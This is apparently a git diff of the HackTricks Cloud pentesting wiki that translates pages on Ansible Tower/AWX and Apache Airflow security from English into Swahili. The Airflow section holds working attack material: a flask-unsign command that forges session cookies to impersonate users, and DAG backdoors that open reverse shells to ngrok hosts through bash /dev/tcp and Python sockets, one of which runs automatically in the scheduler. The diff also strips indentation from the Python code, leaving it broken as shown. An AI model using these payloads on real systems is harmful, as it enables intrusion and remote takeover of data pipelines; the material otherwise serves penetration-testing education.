diff --git a/src/README.md b/src/README.md
index 01b146fd1..c51d8a491 100644
--- a/src/README.md
+++ b/src/README.md
@@ -9,23 +9,23 @@ Reading time: {{ #reading_time }}
_Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
> [!TIP]
-> Welcome to the page where you will find each **hacking trick/technique/whatever related to CI/CD & Cloud** I have learnt in **CTFs**, **real** life **environments**, **researching**, and **reading** researches and news.
+> Karibu kwenye ukurasa ambapo utaweza kupata kila **hacking trick/technique/whatever related to CI/CD & Cloud** nilizojifunza katika **CTFs**, **maisha** halisi **mazingira**, **utafiti**, na **kusoma** tafiti na habari.
### **Pentesting CI/CD Methodology**
-**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
+**Katika HackTricks CI/CD Methodology utaweza kuona jinsi ya pentest miundombinu inayohusiana na shughuli za CI/CD.** Soma ukurasa ufuatao kwa **utangulizi:**
[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
### Pentesting Cloud Methodology
-**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
+**Katika HackTricks Cloud Methodology utaweza kuona jinsi ya pentest mazingira ya wingu.** Soma ukurasa ufuatao kwa **utangulizi:**
[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
### License & Disclaimer
-**Check them in:**
+**Angalia katika:**
[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
@@ -34,7 +34,3 @@ _Hacktricks logos & motion designed by_ [_@ppiernacho_](https://www.instagram.co
{{#include ./banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
index feae5163c..1b1d60c58 100644
--- a/src/SUMMARY.md
+++ b/src/SUMMARY.md
@@ -505,3 +505,5 @@
+
+
diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md
index b684cee3d..1d810d657 100644
--- a/src/banners/hacktricks-training.md
+++ b/src/banners/hacktricks-training.md
@@ -1,17 +1,13 @@
> [!TIP]
-> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+> Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+> Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
>
>
>
> Support HackTricks
>
-> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-> - **Join the** š¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** š¦ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
-> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
+> - **Jiunge na** š¬ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** š¦ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
>
-
-
-
-
diff --git a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
index d3fbf19e5..0199a17a0 100644
--- a/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
+++ b/src/pentesting-ci-cd/ansible-tower-awx-automation-controller-security.md
@@ -4,60 +4,59 @@
## Basic Information
-**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansibleās user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Towerās REST API and command-line interface make it simple to integrate it into current tools and workflows.
+**Ansible Tower** au toleo lake la wazi [**AWX**](https://github.com/ansible/awx) pia inajulikana kama **kiwango cha mtumiaji wa Ansible, dashibodi, na REST API**. Pamoja na **udhibiti wa ufikiaji kulingana na majukumu**, kupanga kazi, na usimamizi wa hesabu wa picha, unaweza kusimamia miundombinu yako ya Ansible kutoka kwa UI ya kisasa. REST API ya Tower na kiolesura cha amri hufanya iwe rahisi kuunganisha na zana na mifumo ya kazi ya sasa.
-**Automation Controller is a newer** version of Ansible Tower with more capabilities.
+**Automation Controller ni toleo jipya** la Ansible Tower lenye uwezo zaidi.
### Differences
-According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows.
+Kulingana na [**hii**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), tofauti kuu kati ya Ansible Tower na AWX ni msaada uliopokelewa na Ansible Tower ina vipengele vya ziada kama udhibiti wa ufikiaji kulingana na majukumu, msaada wa APIs za kawaida, na mifumo ya kazi iliyofafanuliwa na mtumiaji.
### Tech Stack
-- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs.
-- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface.
-- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data.
-- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners.
-- **Redis**: Redis serves as a cache and a backend for the task queue.
+- **Web Interface**: Hii ni kiolesura cha picha ambapo watumiaji wanaweza kusimamia hesabu, ithibati, templeti, na kazi. Imeundwa kuwa ya kueleweka na inatoa picha kusaidia kuelewa hali na matokeo ya kazi zako za automatisering.
+- **REST API**: Kila kitu unachoweza kufanya kwenye kiolesura cha wavuti, unaweza pia kufanya kupitia REST API. Hii inamaanisha unaweza kuunganisha AWX/Tower na mifumo mingine au kuandika hatua ambazo ungeweza kufanya kawaida kwenye kiolesura.
+- **Database**: AWX/Tower inatumia hifadhidata (kawaida PostgreSQL) kuhifadhi usanidi wake, matokeo ya kazi, na data nyingine muhimu za uendeshaji.
+- **RabbitMQ**: Hii ni mfumo wa ujumbe unaotumiwa na AWX/Tower kuwasiliana kati ya vipengele tofauti, hasa kati ya huduma ya wavuti na waendesha kazi.
+- **Redis**: Redis inatumika kama cache na nyuma ya foleni ya kazi.
### Logical Components
-- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc.
-- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed..
-- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job.
-- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run.
-- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials.
-- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events.
-- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc.
-- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed.
+- **Inventories**: Hesabu ni **mkusanyiko wa wenyeji (au nodi)** ambao **kazi** (Ansible playbooks) zinaweza **kufanywa**. AWX/Tower inakuwezesha kufafanua na kuunganisha hesabu zako na pia inasaidia hesabu za kidinamik ambazo zinaweza **kupata orodha za wenyeji kutoka mifumo mingine** kama AWS, Azure, nk.
+- **Projects**: Mradi kimsingi ni **mkusanyiko wa Ansible playbooks** zinazotolewa kutoka kwa **mfumo wa udhibiti wa toleo** (kama Git) ili kuvuta playbooks za hivi karibuni inapohitajika.
+- **Templates**: Templeti za kazi zinafafanua **jinsi playbook fulani itakavyofanywa**, ikitaja **hesabu**, **ithibati**, na **vigezo** vingine vya kazi.
+- **Credentials**: AWX/Tower inatoa njia salama ya **kusimamia na kuhifadhi siri, kama funguo za SSH, nywila, na token za API**. Ithibati hizi zinaweza kuunganishwa na templeti za kazi ili playbooks zipate ufikiaji unaohitajika zinapofanya kazi.
+- **Task Engine**: Hapa ndipo uchawi unafanyika. Injini ya kazi imejengwa juu ya Ansible na inawajibika kwa **kufanya playbooks**. Kazi zinatumwa kwa injini ya kazi, ambayo kisha inafanya playbooks za Ansible dhidi ya hesabu iliyotengwa kwa kutumia ithibati zilizotolewa.
+- **Schedulers and Callbacks**: Hizi ni vipengele vya juu katika AWX/Tower vinavyoruhusu **kazi kuandaliwa** kufanywa kwa nyakati maalum au kuanzishwa na matukio ya nje.
+- **Notifications**: AWX/Tower inaweza kutuma arifa kulingana na mafanikio au kushindwa kwa kazi. Inasaidia njia mbalimbali za arifa kama barua pepe, ujumbe wa Slack, webhooks, nk.
+- **Ansible Playbooks**: Ansible playbooks ni zana za usanidi, uwekaji, na uratibu. Zinabainisha hali inayotakiwa ya mifumo kwa njia ya automatisering, inayoweza kurudiwa. Imeandikwa kwa YAML, playbooks hutumia lugha ya automatisering ya kutangulia ya Ansible kuelezea usanidi, kazi, na hatua zinazohitajika kutekelezwa.
### Job Execution Flow
-1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower.
+1. **User Interaction**: Mtumiaji anaweza kuingiliana na AWX/Tower ama kupitia **Web Interface** au **REST API**. Hizi zinatoa ufikiaji wa mbele kwa kazi zote zinazotolewa na AWX/Tower.
2. **Job Initiation**:
- - The user, via the Web Interface or API, initiates a job based on a **Job Template**.
- - The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**.
- - Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution.
+- Mtumiaji, kupitia Web Interface au API, anaanzisha kazi kulingana na **Job Template**.
+- Job Template inajumuisha marejeleo kwa **Hesabu**, **Mradi** (unaoshikilia playbook), na **Ithibati**.
+- Mara kazi inapoanzishwa, ombi linawekwa kwa AWX/Tower backend ili kuorodhesha kazi hiyo kwa utekelezaji.
3. **Job Queuing**:
- - **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ.
- - **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution.
+- **RabbitMQ** inashughulikia ujumbe kati ya kipengele cha wavuti na waendesha kazi. Mara kazi inapoanzishwa, ujumbe unatumwa kwa injini ya kazi kwa kutumia RabbitMQ.
+- **Redis** inafanya kazi kama nyuma ya foleni ya kazi, ikisimamia kazi zilizoorodheshwa zinazosubiri utekelezaji.
4. **Job Execution**:
- - The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials.
- - Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**.
- - As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**.
+- **Task Engine** inachukua kazi iliyoorodheshwa. Inapata taarifa muhimu kutoka kwa **Database** kuhusu playbook inayohusishwa na kazi, hesabu, na ithibati.
+- Kwa kutumia playbook ya Ansible iliyopatikana kutoka kwa **Mradi** uliohusishwa, Injini ya Kazi inafanya playbook dhidi ya nodi za **Hesabu** zilizotajwa kwa kutumia **Ithibati** zilizotolewa.
+- Wakati playbook inafanya kazi, matokeo yake ya utekelezaji (kumbukumbu, ukweli, nk) yanakusanywa na kuhifadhiwa katika **Database**.
5. **Job Results**:
- - Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**.
- - Users can then view the results through the Web Interface or query them via the REST API.
- - Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc.
+- Mara playbook inapokamilisha kazi, matokeo (mafanikio, kushindwa, kumbukumbu) yanahifadhiwa kwenye **Database**.
+- Watumiaji wanaweza kisha kuona matokeo kupitia Web Interface au kuyatafuta kupitia REST API.
+- Kulingana na matokeo ya kazi, **Arifa** zinaweza kutumwa ili kuwajulisha watumiaji au mifumo ya nje kuhusu hali ya kazi. Arifa zinaweza kuwa barua pepe, ujumbe wa Slack, webhooks, nk.
6. **External Systems Integration**:
- - **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more.
- - **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution.
- - **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times.
+- **Hesabu** zinaweza kupatikana kwa kidinamik kutoka mifumo ya nje, ikiruhusu AWX/Tower kuvuta wenyeji kutoka vyanzo kama AWS, Azure, VMware, na zaidi.
+- **Miradi** (playbooks) zinaweza kupatikana kutoka kwa mifumo ya udhibiti wa toleo, kuhakikisha matumizi ya playbooks za kisasa wakati wa utekelezaji wa kazi.
+- **Schedulers and Callbacks** zinaweza kutumika kuunganisha na mifumo au zana nyingine, ikifanya AWX/Tower kujibu vichocheo vya nje au kufanya kazi kwa nyakati zilizopangwa.
### AWX lab creation for testing
-[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX:
-
+[**Kufuata nyaraka**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) inawezekana kutumia docker-compose kuendesha AWX:
```bash
git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version
@@ -83,7 +82,6 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser
# Load demo data
docker exec tools_awx_1 awx-manage create_preload_data
```
-
## RBAC
### Supported roles
@@ -97,47 +95,43 @@ From a **white box security** review, you would need the **System Auditor role**
Expand this to get detailed description of available roles
1. **System Administrator**:
- - This is the superuser role with permissions to access and modify any resource in the system.
- - They can manage all organizations, teams, projects, inventories, job templates, etc.
+- This is the superuser role with permissions to access and modify any resource in the system.
+- They can manage all organizations, teams, projects, inventories, job templates, etc.
2. **System Auditor**:
- - Users with this role can view all system data but cannot make any changes.
- - This role is designed for compliance and oversight.
+- Users with this role can view all system data but cannot make any changes.
+- This role is designed for compliance and oversight.
3. **Organization Roles**:
- - **Admin**: Full control over the organization's resources.
- - **Auditor**: View-only access to the organization's resources.
- - **Member**: Basic membership in an organization without any specific permissions.
- - **Execute**: Can run job templates within the organization.
- - **Read**: Can view the organizationās resources.
+- **Admin**: Udhibiti kamili juu ya rasilimali za shirika.
+- **Auditor**: Ufikiaji wa kuangalia tu kwa rasilimali za shirika.
+- **Member**: Uanachama wa msingi katika shirika bila ruhusa maalum.
+- **Execute**: Anaweza kuendesha templeti za kazi ndani ya shirika.
+- **Read**: Anaweza kuona rasilimali za shirika.
4. **Project Roles**:
- - **Admin**: Can manage and modify the project.
- - **Use**: Can use the project in a job template.
- - **Update**: Can update project using SCM (source control).
+- **Admin**: Anaweza kusimamia na kubadilisha mradi.
+- **Use**: Anaweza kutumia mradi katika templeti ya kazi.
+- **Update**: Anaweza kuboresha mradi kwa kutumia SCM (udhibiti wa chanzo).
5. **Inventory Roles**:
- - **Admin**: Can manage and modify the inventory.
- - **Ad Hoc**: Can run ad hoc commands on the inventory.
- - **Update**: Can update the inventory source.
- - **Use**: Can use the inventory in a job template.
- - **Read**: View-only access.
+- **Admin**: Anaweza kusimamia na kubadilisha hesabu.
+- **Ad Hoc**: Anaweza kuendesha amri za ad hoc kwenye hesabu.
+- **Update**: Anaweza kuboresha chanzo cha hesabu.
+- **Use**: Anaweza kutumia hesabu katika templeti ya kazi.
+- **Read**: Ufikiaji wa kuangalia tu.
6. **Job Template Roles**:
- - **Admin**: Can manage and modify the job template.
- - **Execute**: Can run the job.
- - **Read**: View-only access.
+- **Admin**: Anaweza kusimamia na kubadilisha templeti ya kazi.
+- **Execute**: Anaweza kuendesha kazi.
+- **Read**: Ufikiaji wa kuangalia tu.
7. **Credential Roles**:
- - **Admin**: Can manage and modify the credentials.
- - **Use**: Can use the credentials in job templates or other relevant resources.
- - **Read**: View-only access.
+- **Admin**: Anaweza kusimamia na kubadilisha akreditivu.
+- **Use**: Anaweza kutumia akreditivu katika templeti za kazi au rasilimali nyingine zinazohusiana.
+- **Read**: Ufikiaji wa kuangalia tu.
8. **Team Roles**:
- - **Member**: Part of the team but without any specific permissions.
- - **Admin**: Can manage the team's members and associated resources.
+- **Member**: Sehemu ya timu lakini bila ruhusa maalum.
+- **Admin**: Anaweza kusimamia wanachama wa timu na rasilimali zinazohusiana.
9. **Workflow Roles**:
- - **Admin**: Can manage and modify the workflow.
- - **Execute**: Can run the workflow.
- - **Read**: View-only access.
+- **Admin**: Anaweza kusimamia na kubadilisha mchakato.
+- **Execute**: Anaweza kuendesha mchakato.
+- **Read**: Ufikiaji wa kuangalia tu.
{{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/apache-airflow-security/README.md b/src/pentesting-ci-cd/apache-airflow-security/README.md
index aac46128c..3fdb9cb25 100644
--- a/src/pentesting-ci-cd/apache-airflow-security/README.md
+++ b/src/pentesting-ci-cd/apache-airflow-security/README.md
@@ -4,20 +4,19 @@
### Basic Information
-[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
+[**Apache Airflow**](https://airflow.apache.org) inatumika kama jukwaa la **kuandaa na kupanga mipango ya data au kazi**. Neno "kuandaa" katika muktadha wa mipango ya data linaashiria mchakato wa kupanga, kuratibu, na kusimamia kazi ngumu za data zinazotokana na vyanzo mbalimbali. Lengo kuu la mipango hii ya data iliyopangwa ni kutoa seti za data zilizoshughulikiwa na zinazoweza kutumika. Seti hizi za data zinatumika sana na maombi mengi, ikiwa ni pamoja na lakini sio tu zana za akili ya biashara, sayansi ya data na mifano ya kujifunza mashine, ambazo zote ni msingi wa utendaji wa maombi makubwa ya data.
-Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
+Kwa msingi, Apache Airflow itakuruhusu **kupanga utekelezaji wa msimbo wakati kitu** (tukio, cron) **kinatokea**.
### Local Lab
#### Docker-Compose
-You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete apache airflow docker environment. (If you are in MacOS make sure to give at least 6GB of RAM to the docker VM).
+Unaweza kutumia **faili ya usanidi ya docker-compose kutoka** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) kuanzisha mazingira kamili ya docker ya apache airflow. (Ikiwa uko kwenye MacOS hakikisha unatoa angalau 6GB ya RAM kwa VM ya docker).
#### Minikube
-One easy way to **run apache airflo**w is to run it **with minikube**:
-
+Njia moja rahisi ya **kufanya kazi apache airflow** ni kuikimbia **na minikube**:
```bash
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
@@ -27,10 +26,9 @@ helm install airflow-release airflow-stable/airflow
# Use this command to delete it
helm delete airflow-release
```
-
### Airflow Configuration
-Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
+Airflow inaweza kuhifadhi **taarifa nyeti** katika usanidi wake au unaweza kupata usanidi dhaifu ulio katika nafasi:
{{#ref}}
airflow-configuration.md
@@ -38,7 +36,7 @@ airflow-configuration.md
### Airflow RBAC
-Before start attacking Airflow you should understand **how permissions work**:
+Kabla ya kuanza kushambulia Airflow unapaswa kuelewa **jinsi ruhusa zinavyofanya kazi**:
{{#ref}}
airflow-rbac.md
@@ -48,55 +46,52 @@ airflow-rbac.md
#### Web Console Enumeration
-If you have **access to the web console** you might be able to access some or all of the following information:
+Ikiwa una **ufikiaji wa console ya wavuti** unaweza kuwa na uwezo wa kufikia baadhi au yote ya taarifa zifuatazo:
-- **Variables** (Custom sensitive information might be stored here)
-- **Connections** (Custom sensitive information might be stored here)
- - Access them in `http:///connection/list/`
-- [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
-- List **users & roles**
-- **Code of each DAG** (which might contain interesting info)
+- **Variables** (Taarifa nyeti za kawaida zinaweza kuhifadhiwa hapa)
+- **Connections** (Taarifa nyeti za kawaida zinaweza kuhifadhiwa hapa)
+- Fikia hizo katika `http:///connection/list/`
+- [**Configuration**](./#airflow-configuration) (Taarifa nyeti kama **`secret_key`** na nywila zinaweza kuhifadhiwa hapa)
+- Orodhesha **watumiaji & majukumu**
+- **Code ya kila DAG** (ambayo inaweza kuwa na taarifa za kuvutia)
#### Retrieve Variables Values
-Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http:///variable/list/`.\
-Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
+Variables zinaweza kuhifadhiwa katika Airflow ili **DAGs** ziweze **kufikia** thamani zao. Ni sawa na siri za majukwaa mengine. Ikiwa una **ruhusa za kutosha** unaweza kuzifikia katika GUI katika `http:///variable/list/`.\
+Airflow kwa kawaida itaonyesha thamani ya variable katika GUI, hata hivyo, kulingana na [**hii**](https://marclamberti.com/blog/variables-with-apache-airflow/) inawezekana kuweka **orodha ya variables** ambazo **thamani** zitakuwa zinaonekana kama **asterisks** katika **GUI**.
.png>)
-However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
-To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
-Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
+Hata hivyo, hizi **thamani** bado zinaweza **kupatikana** kupitia **CLI** (unahitaji kuwa na ufikiaji wa DB), **kutekeleza DAG** isiyo na mipaka, **API** inayofikia mwisho wa variables (API inahitaji kuwezeshwa), na **hata GUI yenyewe!**\
+Ili kufikia hizo thamani kutoka kwa GUI chagua tu **variables** unazotaka kufikia na **bonyeza kwenye Actions -> Export**.\
+Njia nyingine ni kufanya **bruteforce** kwa **thamani iliyofichwa** ukitumia **uchujaji wa utafutaji** hadi upate hiyo:
.png>)
#### Privilege Escalation
-If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**.
-
+Ikiwa usanidi wa **`expose_config`** umewekwa kuwa **True**, kutoka **kwa jukumu la Mtumiaji** na **juu** wanaweza **kusoma** **usanidi kwenye wavuti**. Katika usanidi huu, **`secret_key`** inaonekana, ambayo inamaanisha mtumiaji yeyote mwenye hii halali wanaweza **kuunda keki yao iliyosainiwa ili kujifanya kuwa akaunti nyingine yoyote ya mtumiaji**.
```bash
flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
```
+#### DAG Backdoor (RCE katika Airflow worker)
-#### DAG Backdoor (RCE in Airflow worker)
-
-If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
-Note that this reverse shell is going to be executed inside an **airflow worker container**:
-
+Ikiwa una **ufikiaji wa kuandika** mahali ambapo **DAGs zimehifadhiwa**, unaweza tu **kuunda moja** ambayo itakutumia **reverse shell.**\
+Kumbuka kwamba reverse shell hii itatekelezwa ndani ya **airflow worker container**:
```python
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator
with DAG(
- dag_id='rev_shell_bash',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_bash',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
- run = BashOperator(
- task_id='run',
- bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
- )
+run = BashOperator(
+task_id='run',
+bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
+)
```
```python
@@ -105,75 +100,66 @@ from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
- s = socket.socket()
- s.connect((rhost, port))
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
- pty.spawn("/bin/sh")
+s = socket.socket()
+s.connect((rhost, port))
+[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+pty.spawn("/bin/sh")
with DAG(
- dag_id='rev_shell_python',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_python',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
- run = PythonOperator(
- task_id='rs_python',
- python_callable=rs,
- op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
- )
+run = PythonOperator(
+task_id='rs_python',
+python_callable=rs,
+op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
+)
```
+#### DAG Backdoor (RCE katika Airflow scheduler)
-#### DAG Backdoor (RCE in Airflow scheduler)
-
-If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder.
-
+Ikiwa utaweka kitu kifanyike **katika mzizi wa msimbo**, wakati wa kuandika hii, kita **fanywa na scheduler** baada ya sekunde chache baada ya kukiweka ndani ya folda ya DAG.
```python
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
- s = socket.socket()
- s.connect((rhost, port))
- [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
- pty.spawn("/bin/sh")
+s = socket.socket()
+s.connect((rhost, port))
+[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
+pty.spawn("/bin/sh")
rs("2.tcp.ngrok.io", 14403)
with DAG(
- dag_id='rev_shell_python2',
- schedule_interval='0 0 * * *',
- start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
+dag_id='rev_shell_python2',
+schedule_interval='0 0 * * *',
+start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
- run = PythonOperator(
- task_id='rs_python2',
- python_callable=rs,
- op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
+run = PythonOperator(
+task_id='rs_python2',
+python_callable=rs,
+op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
```
+#### Uundaji wa DAG
-#### DAG Creation
+Ikiwa utafanikiwa **kushambulia mashine ndani ya klasta ya DAG**, unaweza kuunda **scripts za DAG** mpya katika folda ya `dags/` na zitakuwa **zinakopiwa katika mashine zingine** ndani ya klasta ya DAG.
-If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.
+#### Uingiliaji wa Kode ya DAG
-#### DAG Code Injection
+Unapotekeleza DAG kutoka kwa GUI unaweza **kupitisha hoja** kwake.\
+Hivyo, ikiwa DAG haijakodishwa vizuri inaweza kuwa **na udhaifu wa Uingiliaji wa Amri.**\
+Hivyo ndivyo ilivyotokea katika CVE hii: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
-When you execute a DAG from the GUI you can **pass arguments** to it.\
-Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
-That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)
-
-All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.
-
-Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
+Kila unachohitaji kujua ili **kuanza kutafuta uingiliaji wa amri katika DAGs** ni kwamba **parameta** zinapatikana kwa kode **`dag_run.conf.get("param_name")`**.
+Zaidi ya hayo, udhaifu sawa unaweza kutokea na **mabadiliko** (zingatia kwamba kwa ruhusa ya kutosha unaweza **kudhibiti thamani ya mabadiliko** katika GUI). Mabadiliko yanapatikana kwa:
```python
from airflow.models import Variable
[...]
